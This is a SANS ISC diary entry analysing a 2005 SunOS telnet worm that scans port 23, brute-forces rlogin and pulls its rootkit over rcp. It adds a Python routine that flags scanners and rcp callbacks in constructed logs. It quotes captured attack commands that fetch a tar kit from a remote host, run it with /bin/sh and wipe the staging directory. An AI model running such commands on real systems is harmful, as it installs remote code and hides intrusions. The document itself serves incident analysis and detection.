SANS ISC: Internet Security | DShield SANS ISC InfoSec Forums

Yatze telnet worm; InfoCon update; rlogin link to telnet maybe?
SunOS telnet worm on the loose: watch ports 23, 513 and 514

The telnet port (23) is being targeted, and rcp (port 514) is the download channel used to grab the worm/autorooter kit.

We have received several reports of what appears to be a telnet negotiation exploit with autorooter- or worm-like qualities.

Further reports show that many of the hosts being reported for telnet scans are also being reported for rlogin brute-forcing on port 513.

It was reported that the probes for port 23 began on 03/20/2005.

Looking at port 23 shows it has been fairly active, but the number of targets increased sharply on 03/23/2005.

I pulled these commands from a user-provided tcpdump file:

mkdir /tmp/.m ; cd /tmp/.m; echo /usr/bin/rcp
news@`/usr/bin/uname -m`.tar . >
echo /usr/bin/tar -xvf yatze-SunOS_`/usr/bin/uname -m`.tar >>
echo cd rk \; /bin/sh go >>
echo cd / \; rm -rf /tmp/.m/\* \; rm -rf /tmp/.m >>
/usr/bin/nohup /bin/sh >/dev/null 2>/dev/null &

We have not gotten a copy of the actual worm/autorooter yet.

If you have a copy, we would like to analyze it.

I looked at most of the port 23 "violators"; they are also showing up for attempting to brute-force guess passwords on port 513 (rlogin).
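The two traffic patterns described above (one source scanning port 23 across many hosts and also brute-forcing 513, and a victim that accepts a telnet connection and then calls back to the same peer on 514 to fetch the kit with rcp) can be correlated from a connection log. The following is an added example, not code from the diary or from ISC; the log records are constructed, and the field layout and thresholds are assumptions.

```python
# Added example (not from the ISC diary): correlate constructed connection
# records to flag the two patterns the diary describes.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records: "timestamp src dst dport" (TCP connections
# seen at a border sensor). 198.51.100.7 is the constructed scanner;
# 192.0.2.10 is the constructed victim that calls back on TCP/514.
SAMPLE_LOG = """\
2005-03-23T10:00:01 198.51.100.7 192.0.2.10 23
2005-03-23T10:00:02 198.51.100.7 192.0.2.11 23
2005-03-23T10:00:03 198.51.100.7 192.0.2.12 23
2005-03-23T10:00:09 198.51.100.7 192.0.2.10 513
2005-03-23T10:00:40 192.0.2.10 198.51.100.7 514
2005-03-23T11:15:00 203.0.113.5 192.0.2.20 23
2005-03-23T11:15:05 192.0.2.20 203.0.113.9 22
"""

def parse(log):
    """Parse the assumed 'timestamp src dst dport' layout into tuples."""
    recs = []
    for line in log.splitlines():
        ts, src, dst, dport = line.split()
        recs.append((datetime.fromisoformat(ts), src, dst, int(dport)))
    return recs

def scanners(recs, min_targets=3):
    """Sources that hit TCP/23 on >= min_targets hosts and also touched TCP/513."""
    telnet = defaultdict(set)
    rlogin = set()
    for _, src, dst, dport in recs:
        if dport == 23:
            telnet[src].add(dst)
        elif dport == 513:
            rlogin.add(src)
    return sorted(s for s, t in telnet.items()
                  if len(t) >= min_targets and s in rlogin)

def rcp_callbacks(recs, window=timedelta(minutes=5)):
    """Hosts that accept inbound TCP/23, then open TCP/514 back to the same peer."""
    inbound = defaultdict(list)  # victim -> [(peer, time of inbound telnet)]
    hits = []
    for ts, src, dst, dport in sorted(recs):
        if dport == 23:
            inbound[dst].append((src, ts))
        elif dport == 514:
            for peer, t0 in inbound.get(src, []):
                if peer == dst and t0 <= ts <= t0 + window:
                    hits.append((src, dst))
                    break
    return hits
```

A victim-to-attacker 514 connection shortly after an inbound 23 is the stronger indicator, since rcp traffic to an address that just connected on telnet has no normal business reason.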

InfoCon Alert Status Calibration

We have received a lot of emails about our InfoCon Alert Status since yesterday's diary requested your feedback and opinions on it.

We will review them and consider each suggestion.

Please keep submitting your ideas via the contact page.

Mar 26th 2005
